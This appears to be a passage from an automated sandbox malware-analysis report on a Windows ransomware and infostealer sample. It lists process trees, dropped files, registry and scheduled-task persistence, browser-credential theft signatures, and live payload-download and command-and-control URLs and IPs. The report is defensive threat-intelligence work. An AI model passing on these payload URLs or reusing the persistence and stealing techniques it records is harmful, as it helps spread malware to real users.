20->35         started        37 2 other processes 20->37 process6 dnsIp7 99 api.2ip.ua 104.21.65.24, 443, 49699, 49700 CLOUDFLARENETUS United States 22->99 69 C:\Users\user\AppData\...\qJKiVKZdFk.exe, PE32 22->69 dropped 39 qJKiVKZdFk.exe 22->39         started        42 icacls.exe 22->42         started        71 C:\Users\user\_README.txt, ASCII 26->71 dropped 73 C:\Users\user\Desktop\...73WCXBPIUYI.xlsx, data 26->73 dropped 75 C:\Users\user\DesktopbehaviorgraphLTYDMDUST.pdf, data 26->75 dropped 77 2 other malicious files 26->77 dropped 135 Modifies existing user documents (likely ransomware behavior) 26->135 44 schtasks.exe 29->44         started        file8 signatures9 process10 signatures11 133 Injects a PE file into a foreign processes 39->133 46 qJKiVKZdFk.exe 1 23 39->46         started        51 conhost.exe 44->51         started        process12 dnsIp13 105 cajgtus.com 189.232.19.193, 49703, 49704, 49705 UninetSAdeCVMX Mexico 46->105 107 sdfjhuz.com 211.181.24.132, 49702, 80 LGDACOMLGDACOMCorporationKR Korea Republic of 46->107 85 C:\Users\user\AppData\Local\...\build2[1].exe, PE32 46->85 dropped 87 C:\_README.txt, ASCII 46->87 dropped 89 10f5ef49-b826-4bae...85f.tmp.bgjs (copy), Google 46->89 dropped 91 91 other malicious files 46->91 dropped 109 Tries to harvest and steal browser information (history, passwords, etc) 46->109 111 Infects executable files (exe, dll, sys, html) 46->111 53 build2.exe 46->53         started        56 build3.exe 46->56         started        file14 signatures15 process16 signatures17 121 Detected unpacking (changes PE section rights) 53->121 123 Detected unpacking (overwrites its own PE header) 53->123 125 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 53->125 127 Writes many files with high entropy 53->127 58 build2.exe 53->58         started        129 Uses schtasks.exe or at.exe to add and modify task schedules 56->129 131 Injects a PE file into a foreign processes 56->131 63 build3.exe 56->63         started        process18 dnsIp19 101 95.217.9.149, 443, 49707, 49709 HETZNER-ASDE Germany 58->101 103 steamcommunity.com 23.65.44.84, 443, 49706 AKAMAI-ASUS United States 58->103 79 C:\Users\user\AppData\Local\...\sqln[1].dll, PE32 58->79 dropped 81 C:\Users\user\...\76561199673019888[1].htm, data 58->81 dropped 137 Tries to harvest and steal browser information (history, passwords, etc) 58->137 83 C:\Users\user\AppData\Roaming\...\mstsca.exe, PE32 63->83 dropped 65 schtasks.exe 63->65         started        file20 signatures21 process22 process23 67 conhost.exe 65->67         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            qJKiVKZdFk.exe45%ReversingLabsWin32.Trojan.Generic
            qJKiVKZdFk.exe100%AviraHEUR/AGEN.1313019
            qJKiVKZdFk.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\build2[1].exe100%AviraHEUR/AGEN.1313019
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\build2[1].exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\build2[1].exe74%ReversingLabsWin32.Spyware.Vidar
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\sqln[1].dll0%ReversingLabs
            C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe45%ReversingLabsWin32.Trojan.Generic
            C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe87%ReversingLabsWin32.Trojan.Azorult

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.wikipedia.com/0%URL Reputationsafe
            http://cajgtus.com/test1/get.php0%Avira URL Cloudsafe
            http://cajgtus.com/files/1/build3.exerun0%Avira URL Cloudsafe
            http://sdfjhuz.com/dl/build2.exeKf100%Avira URL Cloudmalware
            http://sdfjhuz.com/dl/build2.exerun421f100%Avira URL Cloudmalware
            http://sdfjhuz.com/dl/build2.exe$run100%Avira URL Cloudmalware
            http://cajgtus.com/test1/get.phpDh0%Avira URL Cloudsafe
            http://cajgtus.com/files/1/build3.exe$runh0%Avira URL Cloudsafe
            http://cajgtus.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true0%Avira URL Cloudsafe
            http://cajgtus.com/files/1/build3.exe$run0%Avira URL Cloudsafe
            http://cajgtus.com/files/1/build3.exe$runo0%Avira URL Cloudsafe
            http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
            https://95.217.9.149/sqln.dll0%Avira URL Cloudsafe
            http://cajgtus.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF2000%Avira URL Cloudsafe
            http://sdfjhuz.com/dl/build2.exe100%Avira URL Cloudmalware
            http://cajgtus.com/files/1/build3.exe100%Avira URL Cloudmalware
            https://95.217.9.149/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            sdfjhuz.com
            		211.181.24.132
            		truetrue
              		unknown
              cajgtus.com
              		189.232.19.193
              		truetrue
                		unknown
                steamcommunity.com
                		23.65.44.84
                		truefalse
                  		high
                  api.2ip.ua
                  		104.21.65.24
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://cajgtus.com/test1/get.phptrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://steamcommunity.com/profiles/76561199673019888false
                      		high
                      https://api.2ip.ua/geo.jsonfalse
                        		high
                        http://cajgtus.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=truetrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://cajgtus.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200true
                        • Avira URL Cloud: safe
                        		unknown
                        https://95.217.9.149/sqln.dllfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://sdfjhuz.com/dl/build2.exetrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://cajgtus.com/files/1/build3.exetrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://95.217.9.149/false
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://t.me/irfailAtbuild2.exe, 00000012.00000002.1332847113.0000000003540000.00000040.00001000.00020000.00000000.sdmpfalse
                          		high
                          http://cajgtus.com/files/1/build3.exe$runqJKiVKZdFk.exe, 00000006.00000003.1928900670.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008B5000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://assets.activity.windows.com/v1/assetsqJKiVKZdFk.exe, 00000006.00000003.1334941616.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1389742284.00000000031B0000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            https://github.com/react-native-community/react-native-netinfoqJKiVKZdFk.exe, 00000006.00000003.1345260056.00000000097E0000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              https://api.2ip.ua/qJKiVKZdFk.exe, 00000006.00000003.1928900670.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1257098111.00000000008B6000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://cajgtus.com/files/1/build3.exe$runhqJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://cajgtus.com/test1/get.phpDhqJKiVKZdFk.exe, 00000006.00000003.1928900670.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://steamcommunity.com/profiles/76561199673019888ve74rMozilla/5.0build2.exe, 00000012.00000002.1332847113.0000000003540000.00000040.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  http://sdfjhuz.com/dl/build2.exeKfqJKiVKZdFk.exe, 00000006.00000003.1928900670.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://artifacts.dev.azure.com/office/_apis/symbol/symsrv/privacy-sdx.win32.bundle.js.map/e3b0c4429qJKiVKZdFk.exe, 00000006.00000003.1344123996.00000000097E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.amazon.com/qJKiVKZdFk.exe, 00000006.00000003.1331279869.00000000097E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      http://sdfjhuz.com/dl/build2.exe$runqJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://cajgtus.com/files/1/build3.exe$runoqJKiVKZdFk.exe, 00000006.00000003.1928900670.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://cajgtus.com/files/1/build3.exerunqJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.twitter.com/qJKiVKZdFk.exe, 00000006.00000003.1331753147.00000000097E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                        		high
                                        https://clients3.google.com/generate_204qJKiVKZdFk.exe, 00000006.00000003.1345260056.00000000097E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          http://sdfjhuz.com/dl/build2.exerun421fqJKiVKZdFk.exe, 00000006.00000003.1551148901.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.00000000008F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.openssl.org/support/faq.htmlqJKiVKZdFk.exefalse
                                            		high
                                            http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/ErrorqJKiVKZdFk.exe, 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://www.youtube.com/qJKiVKZdFk.exe, 00000006.00000003.1331883438.00000000097E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27qJKiVKZdFk.exe, 00000006.00000003.1928900670.0000000000902000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1551148901.000000000091A000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969176752.0000000000902000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.2ip.ua/HbqJKiVKZdFk.exe, 00000002.00000002.1241276068.00000000006FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://api.2ip.ua/geo.jsonLqJKiVKZdFk.exe, 00000002.00000002.1241276068.00000000006B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.wikipedia.com/qJKiVKZdFk.exe, 00000006.00000003.1331822942.00000000097E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://assets.activity.windows.comqJKiVKZdFk.exe, 00000006.00000003.1334941616.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1389742284.00000000031B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://api.2ip.ua/geo.jsonfqqJKiVKZdFk.exe, 00000006.00000003.1257098111.00000000008B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://t.me/irfailbuild2.exe, 00000012.00000002.1332847113.0000000003540000.00000040.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://activity.windows.comqJKiVKZdFk.exe, 00000006.00000003.1334941616.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1389742284.00000000031B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://api.2ip.ua/:bqJKiVKZdFk.exe, 00000002.00000002.1241276068.00000000006FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://assets.activity.windows.com/v1/assets/$batchqJKiVKZdFk.exe, 00000006.00000003.1334941616.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1389742284.00000000031B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.google.com/qJKiVKZdFk.exe, 00000006.00000003.1331584052.00000000097E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  189.232.19.193
                                                                  		cajgtus.comMexico
                                                                  		8151UninetSAdeCVMXtrue
                                                                  211.181.24.132
                                                                  		sdfjhuz.comKorea Republic of
                                                                  		3786LGDACOMLGDACOMCorporationKRtrue
                                                                  95.217.9.149
                                                                  		unknownGermany
                                                                  		24940HETZNER-ASDEfalse
                                                                  104.21.65.24
                                                                  		api.2ip.uaUnited States
                                                                  		13335CLOUDFLARENETUSfalse
                                                                  23.65.44.84
                                                                  		steamcommunity.comUnited States
                                                                  		16625AKAMAI-ASUSfalse

                                                                  General Information

                                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                                  Analysis ID:1431076
                                                                  Start date and time:2024-04-24 14:41:08 +02:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 12m 52s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:43
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:qJKiVKZdFk.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:f3ad3e0f90adfd9a28dbeab4bc6196ef.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.rans.spre.troj.spyw.evad.winEXE@44/1377@10/5
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 95%
                                                                  • Number of executed functions: 25
                                                                  • Number of non-executed functions: 185
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadFile calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                  • Report size getting too big, too many NtWriteFile calls found.
                                                                  • VT rate limit hit for: qJKiVKZdFk.exe

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  14:42:03Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe s>--Task
                                                                  14:42:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe" --AutoStart
                                                                  14:42:10API Interceptor1x Sleep call for process: qJKiVKZdFk.exe modified
                                                                  14:42:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe" --AutoStart
                                                                  14:42:23API Interceptor1x Sleep call for process: build2.exe modified
                                                                  15:58:01Task SchedulerRun new task: Azure-Update-Task path: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  15:58:45API Interceptor6764683x Sleep call for process: mstsca.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  189.232.19.193SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                  • cajgtus.com/files/1/build3.exe
                                                                  JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                  • sdfjhuz.com/dl/build2.exe
                                                                  211.181.24.1323CB27VUHRg.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                  • sdfjhuz.com/dl/build2.exe
                                                                  JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                  • cajgtus.com/files/1/build3.exe
                                                                  SecuriteInfo.com.Win64.Evo-gen.28136.30716.exeGet hashmaliciousGCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                  • wikkt.com/forum/index.php
                                                                  DYNSkDpbTH.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                  • sajdfue.com/files/1/build3.exe
                                                                  SecuriteInfo.com.FileRepMalware.15116.31352.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                  • nidoe.org/tmp/index.php
                                                                  file.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Stealc, VidarBrowse
                                                                  • nidoe.org/tmp/index.php
                                                                  O50eNzuKlB.exeGet hashmaliciousLummaC, Meduza Stealer, SmokeLoaderBrowse
                                                                  • emgvod.com/uploads/logo4.jpg
                                                                  lxGAurRKvR.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                                  • trmpc.com/check/index.php
                                                                  y9o3Fy6gL2.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                                                                  • sjyey.com/tmp/index.php
                                                                  nJa31W9P4p.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
                                                                  • cbinr.com/forum/index.php
                                                                  95.217.9.149Z4CYGTBlj7.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                    SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                      file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                        rq0mVjR9ar.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                          8jvTeVxooN.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                            UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                              mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                  AaIo4VGgvO.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                      104.21.65.24SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                        UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                          mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                            2llKbb9pR7.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoaderBrowse
                                                                                              CDssd7jEvY.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                                SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                                  WAhYftpepO.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                                    6uVlPQSJ4e.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                      vHpxL6E2sQ.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                        file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse

                                                                                                          Domains

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          sdfjhuz.comZ4CYGTBlj7.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 211.181.24.133
                                                                                                          SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 175.119.10.231
                                                                                                          rq0mVjR9ar.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 186.147.159.149
                                                                                                          8jvTeVxooN.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                          • 123.140.161.243
                                                                                                          UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 186.13.17.220
                                                                                                          3CB27VUHRg.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                          • 211.181.24.132
                                                                                                          mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 190.218.33.18
                                                                                                          JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 189.232.19.193
                                                                                                          AaIo4VGgvO.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 187.228.55.117
                                                                                                          8xFzJWrEIa.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, VidarBrowse
                                                                                                          • 179.27.75.59
                                                                                                          cajgtus.comZ4CYGTBlj7.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 189.163.142.13
                                                                                                          SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 189.232.19.193
                                                                                                          rq0mVjR9ar.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 200.45.93.45
                                                                                                          8jvTeVxooN.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                          • 85.11.159.22
                                                                                                          UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 189.245.19.217
                                                                                                          3CB27VUHRg.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                          • 81.183.132.103
                                                                                                          mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 58.151.148.90
                                                                                                          JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 211.181.24.132
                                                                                                          AaIo4VGgvO.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 189.195.132.134
                                                                                                          steamcommunity.comZ4CYGTBlj7.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 184.85.65.125
                                                                                                          SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 23.66.133.162
                                                                                                          file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                          • 23.66.133.162
                                                                                                          rq0mVjR9ar.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 96.17.209.196
                                                                                                          8jvTeVxooN.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                          • 184.30.90.143
                                                                                                          UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 23.59.200.146
                                                                                                          mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 104.106.57.101
                                                                                                          JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 23.76.43.59
                                                                                                          AaIo4VGgvO.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 104.67.208.180
                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                          • 23.47.27.74
                                                                                                          api.2ip.uaZ4CYGTBlj7.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 172.67.139.220
                                                                                                          SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 104.21.65.24
                                                                                                          rq0mVjR9ar.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 172.67.139.220
                                                                                                          8jvTeVxooN.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                          • 172.67.139.220
                                                                                                          UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 104.21.65.24
                                                                                                          3CB27VUHRg.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                          • 172.67.139.220
                                                                                                          mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 104.21.65.24
                                                                                                          JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 172.67.139.220
                                                                                                          AaIo4VGgvO.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 172.67.139.220
